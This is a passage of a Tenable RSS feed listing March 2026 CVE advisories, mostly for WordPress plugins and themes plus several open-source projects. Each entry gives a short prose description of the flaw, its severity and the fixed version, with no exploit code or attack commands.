            <title><![CDATA[CVE-2026-32359]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32359</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32359</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:49 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in bPlugins Icon List Block icon-list-block allows Stored XSS. This issue affects Icon List Block: from n/a through <= 1.2.3.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32359">https://www.tenable.com/cve/CVE-2026-32359</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32358]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32358</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32358</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:49 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in wpdevelop Booking Calendar booking allows Blind SQL Injection. This issue affects Booking Calendar: from n/a through <= 10.14.15.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32358">https://www.tenable.com/cve/CVE-2026-32358</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32357]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32357</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32357</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:49 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Server-Side Request Forgery (SSRF) vulnerability in Katsushi Kawamori Simple Blog Card simple-blog-card allows Server Side Request Forgery. This issue affects Simple Blog Card: from n/a through <= 2.37.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32357">https://www.tenable.com/cve/CVE-2026-32357</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32356]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32356</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32356</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:47 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in robosoft Robo Gallery robo-gallery allows DOM-Based XSS. This issue affects Robo Gallery: from n/a through <= 5.1.2.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32356">https://www.tenable.com/cve/CVE-2026-32356</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32355]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32355</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32355</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:47 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Deserialization of Untrusted Data vulnerability in Crocoblock JetEngine jet-engine allows Object Injection. This issue affects JetEngine: from n/a through < 3.8.4.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32355">https://www.tenable.com/cve/CVE-2026-32355</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32354]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32354</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32354</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:47 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Insertion of Sensitive Information Into Sent Data vulnerability in magepeopleteam WpEvently mage-eventpress allows Retrieve Embedded Sensitive Data. This issue affects WpEvently: from n/a through < 5.1.9.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32354">https://www.tenable.com/cve/CVE-2026-32354</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32353]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32353</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32353</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:47 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Server-Side Request Forgery (SSRF) vulnerability in MailerPress Team MailerPress mailerpress allows Server Side Request Forgery. This issue affects MailerPress: from n/a through <= 1.4.2.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32353">https://www.tenable.com/cve/CVE-2026-32353</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32352]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32352</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32352</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:47 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Elementor Elementor Website Builder elementor allows DOM-Based XSS. This issue affects Elementor Website Builder: from n/a through <= 3.35.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32352">https://www.tenable.com/cve/CVE-2026-32352</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32351]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32351</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32351</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:47 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in blubrry PowerPress Podcasting powerpress allows Stored XSS. This issue affects PowerPress Podcasting: from n/a through <= 11.15.13.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32351">https://www.tenable.com/cve/CVE-2026-32351</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32350]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32350</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32350</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:46 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in wpradiant Chocolate House chocolate-house allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Chocolate House: from n/a through <= 1.1.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32350">https://www.tenable.com/cve/CVE-2026-32350</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32349]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32349</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32349</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:46 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Server-Side Request Forgery (SSRF) vulnerability in Andy Fragen Embed PDF Viewer embed-pdf-viewer allows Server Side Request Forgery. This issue affects Embed PDF Viewer: from n/a through <= 2.4.7.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32349">https://www.tenable.com/cve/CVE-2026-32349</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32348]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32348</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32348</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:46 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in MadrasThemes MAS Videos masvideos allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects MAS Videos: from n/a through <= 1.3.2.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32348">https://www.tenable.com/cve/CVE-2026-32348</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32347]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32347</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32347</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:46 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme Restaurant and Cafe restaurant-and-cafe allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Restaurant and Cafe: from n/a through <= 1.2.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32347">https://www.tenable.com/cve/CVE-2026-32347</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32346]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32346</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32346</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:46 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme Travel Agency travel-agency allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Travel Agency: from n/a through <= 1.5.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32346">https://www.tenable.com/cve/CVE-2026-32346</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32345]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32345</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32345</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:46 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme Perfect Portfolio perfect-portfolio allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Perfect Portfolio: from n/a through <= 1.2.4.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32345">https://www.tenable.com/cve/CVE-2026-32345</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32344]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32344</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32344</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:45 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Cross-Site Request Forgery (CSRF) vulnerability in desertthemes Corpiva corpiva allows Cross Site Request Forgery. This issue affects Corpiva: from n/a through <= 1.0.96.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32344">https://www.tenable.com/cve/CVE-2026-32344</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32343]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32343</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32343</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:45 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Cross-Site Request Forgery (CSRF) vulnerability in Magazine3 Easy Table of Contents easy-table-of-contents allows Cross Site Request Forgery. This issue affects Easy Table of Contents: from n/a through <= 2.0.80.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32343">https://www.tenable.com/cve/CVE-2026-32343</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32342]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32342</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32342</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:45 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Cross-Site Request Forgery (CSRF) vulnerability in Ays Pro Quiz Maker quiz-maker allows Cross Site Request Forgery. This issue affects Quiz Maker: from n/a through <= 6.7.1.2.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32342">https://www.tenable.com/cve/CVE-2026-32342</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32341]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32341</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32341</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:45 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme Benevolent benevolent allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Benevolent: from n/a through <= 1.3.9.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32341">https://www.tenable.com/cve/CVE-2026-32341</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32340]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32340</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32340</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:45 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme Business One Page business-one-page allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Business One Page: from n/a through <= 1.3.2.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32340">https://www.tenable.com/cve/CVE-2026-32340</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32339]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32339</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32339</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:44 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme Bakes And Cakes bakes-and-cakes allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Bakes And Cakes: from n/a through <= 1.2.9.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32339">https://www.tenable.com/cve/CVE-2026-32339</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32338]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32338</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32338</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:44 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme Construction Landing Page construction-landing-page allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Construction Landing Page: from n/a through <= 1.4.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32338">https://www.tenable.com/cve/CVE-2026-32338</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32337]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32337</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32337</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:44 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme Preschool and Kindergarten preschool-and-kindergarten allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Preschool and Kindergarten: from n/a through <= 1.2.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32337">https://www.tenable.com/cve/CVE-2026-32337</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32336]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32336</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32336</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:44 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme Rara Business rara-business allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Rara Business: from n/a through <= 1.3.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32336">https://www.tenable.com/cve/CVE-2026-32336</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32335]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32335</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32335</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:44 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme The Conference the-conference allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects The Conference: from n/a through <= 1.2.5.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32335">https://www.tenable.com/cve/CVE-2026-32335</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32334]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32334</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32334</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:43 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in raratheme JobScout jobscout allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects JobScout: from n/a through <= 1.1.7.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32334">https://www.tenable.com/cve/CVE-2026-32334</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32332]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32332</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32332</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:43 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Ays Pro Easy Form easy-form allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Easy Form: from n/a through <= 2.7.9.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32332">https://www.tenable.com/cve/CVE-2026-32332</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32331]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32331</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32331</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:43 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Israpil Textmetrics webtexttool allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Textmetrics: from n/a through <= 3.6.4.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32331">https://www.tenable.com/cve/CVE-2026-32331</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32330]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32330</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32330</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:43 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Cross-Site Request Forgery (CSRF) vulnerability in 10Web Photo Gallery by 10Web photo-gallery allows Cross Site Request Forgery. This issue affects Photo Gallery by 10Web: from n/a through <= 1.8.37.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32330">https://www.tenable.com/cve/CVE-2026-32330</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32329]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32329</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32329</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:43 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Missing Authorization vulnerability in Ays Pro Advanced Related Posts advanced-related-posts allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Advanced Related Posts: from n/a through <= 1.9.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32329">https://www.tenable.com/cve/CVE-2026-32329</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32328]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32328</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32328</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:42 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Cross-Site Request Forgery (CSRF) vulnerability in shufflehound Lemmony lemmony allows Cross Site Request Forgery. This issue affects Lemmony: from n/a through < 1.7.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32328">https://www.tenable.com/cve/CVE-2026-32328</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32322]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32322</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32322</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:42 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>soroban-sdk is a Rust SDK for Soroban contracts. Prior to 22.0.11, 23.5.3, and 25.3.0, the Fr (scalar field) types for BN254 and BLS12-381 in soroban-sdk compared values using their raw U256 representation without first reducing modulo the field modulus r. This caused mathematically equal field elements to compare as not-equal when one or both values were unreduced (i.e., >= r). The vulnerability requires an attacker to supply crafted Fr values through contract inputs, and compare them directly without going through host-side arithmetic operations. Smart contracts that rely on Fr equality checks for security-critical logic could produce incorrect results. The impact depends on how the affected contract uses Fr equality comparisons, but can result in incorrect authorization decisions or validation bypasses in contracts that perform equality checks on user-supplied scalar values. This vulnerability is fixed in 22.0.11, 23.5.3, and 25.3.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32322">https://www.tenable.com/cve/CVE-2026-32322</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32320]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32320</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32320</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:42 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Ella Core is a 5G core designed for private networks. Prior to 1.5.1, Ella Core panics when processing a PathSwitchRequest containing UE Security Capabilities with zero-length NR encryption or integrity protection algorithm bitstrings, resulting in a denial of service. An attacker able to send crafted NGAP messages to Ella Core can crash the process, causing service disruption for all connected subscribers. No authentication is required. This vulnerability is fixed in 1.5.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32320">https://www.tenable.com/cve/CVE-2026-32320</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32319]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32319</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32319</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:42 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Ella Core is a 5G core designed for private networks. Prior to 1.5.1, Ella Core panics when processing a malformed integrity-protected NGAP/NAS message with a length under 7 bytes. An attacker able to send crafted NAS messages to Ella Core can crash the process, causing service disruption for all connected subscribers. No authentication is required. This vulnerability is fixed in 1.5.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32319">https://www.tenable.com/cve/CVE-2026-32319</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32308]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32308</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32308</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:42 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>OneUptime is a solution for monitoring and managing online services. Prior to 10.0.23, the Markdown viewer component renders Mermaid diagrams with securityLevel: "loose" and injects the SVG output via innerHTML. This configuration explicitly allows interactive event bindings in Mermaid diagrams, enabling XSS through Mermaid's click directive which can execute arbitrary JavaScript. Any field that renders markdown (incident descriptions, status page announcements, monitor notes) is vulnerable. This vulnerability is fixed in 10.0.23.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32308">https://www.tenable.com/cve/CVE-2026-32308</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32306]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32306</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32306</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:42 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>OneUptime is a solution for monitoring and managing online services. Prior to 10.0.23, the telemetry aggregation API accepts user-controlled aggregationType, aggregateColumnName, and aggregationTimestampColumnName parameters and interpolates them directly into ClickHouse SQL queries via the .append() method (documented as "trusted SQL"). There is no allowlist, no parameterized query binding, and no input validation. An authenticated user can inject arbitrary SQL into ClickHouse, enabling full database read (including telemetry data from all tenants), data modification, and potential remote code execution via ClickHouse table functions. This vulnerability is fixed in 10.0.23.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32306">https://www.tenable.com/cve/CVE-2026-32306</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32304]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32304</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32304</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:41 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Locutus brings stdlibs of other programming languages to JavaScript for educational purposes. Prior to 3.0.14, the create_function(args, code) function passes both parameters directly to the Function constructor without any sanitization, allowing arbitrary code execution. This is distinct from CVE-2026-29091 which was call_user_func_array using eval() in v2.x. This finding affects create_function using new Function() in v3.x. This vulnerability is fixed in 3.0.14.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32304">https://www.tenable.com/cve/CVE-2026-32304</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32302]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32302</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32302</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:41 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>OpenClaw is a personal AI assistant. Prior to 2026.3.11, browser-originated WebSocket connections could bypass origin validation when gateway.auth.mode was set to trusted-proxy and the request arrived with proxy headers. A page served from an untrusted origin could connect through a trusted reverse proxy, inherit proxy-authenticated identity, and establish a privileged operator session. This vulnerability is fixed in 2026.3.11.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32302">https://www.tenable.com/cve/CVE-2026-32302</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32301]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32301</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32301</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:41 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Centrifugo is an open-source scalable real-time messaging server. Prior to 6.7.0, Centrifugo is vulnerable to Server-Side Request Forgery (SSRF) when configured with a dynamic JWKS endpoint URL using template variables (e.g. {{tenant}}). An unauthenticated attacker can craft a JWT with a malicious iss or aud claim value that gets interpolated into the JWKS fetch URL before the token signature is verified, causing Centrifugo to make an outbound HTTP request to an attacker-controlled destination. This vulnerability is fixed in 6.7.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32301">https://www.tenable.com/cve/CVE-2026-32301</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32269]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32269</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32269</guid>
            <pubDate>Thu, 12 Mar 2026 20:16:06 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to 9.6.0-alpha.13 and 8.6.39, the OAuth2 authentication adapter does not correctly validate app IDs when appidField and appIds are configured. During app ID validation, a malformed value is sent to the token introspection endpoint instead of the user's actual access token. Depending on the introspection endpoint's behavior, this could either cause all OAuth2 logins to fail, or allow authentication from disallowed app contexts if the endpoint returns valid-looking data for the malformed request. Deployments using the OAuth2 adapter with appidField and appIds configured are affected. This vulnerability is fixed in 9.6.0-alpha.13 and 8.6.39.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32269">https://www.tenable.com/cve/CVE-2026-32269</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32251]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32251</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32251</guid>
            <pubDate>Thu, 12 Mar 2026 20:16:05 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Tolgee is an open-source localization platform. Prior to 3.166.3, the XML parsers used for importing Android XML resources (.xml) and .resx files don't disable external entity processing. An authenticated user who can import translation files into a project can exploit this to read arbitrary files from the server and make server-side requests to internal services. This vulnerability is fixed in 3.166.3.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-32251">https://www.tenable.com/cve/CVE-2026-32251</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-32248]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-32248</link>
            <guid>https://www.tenable.com/cve/CVE-2026-32248</guid>
            <pubDate>Thu, 12 Mar 2026 20:16:05 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
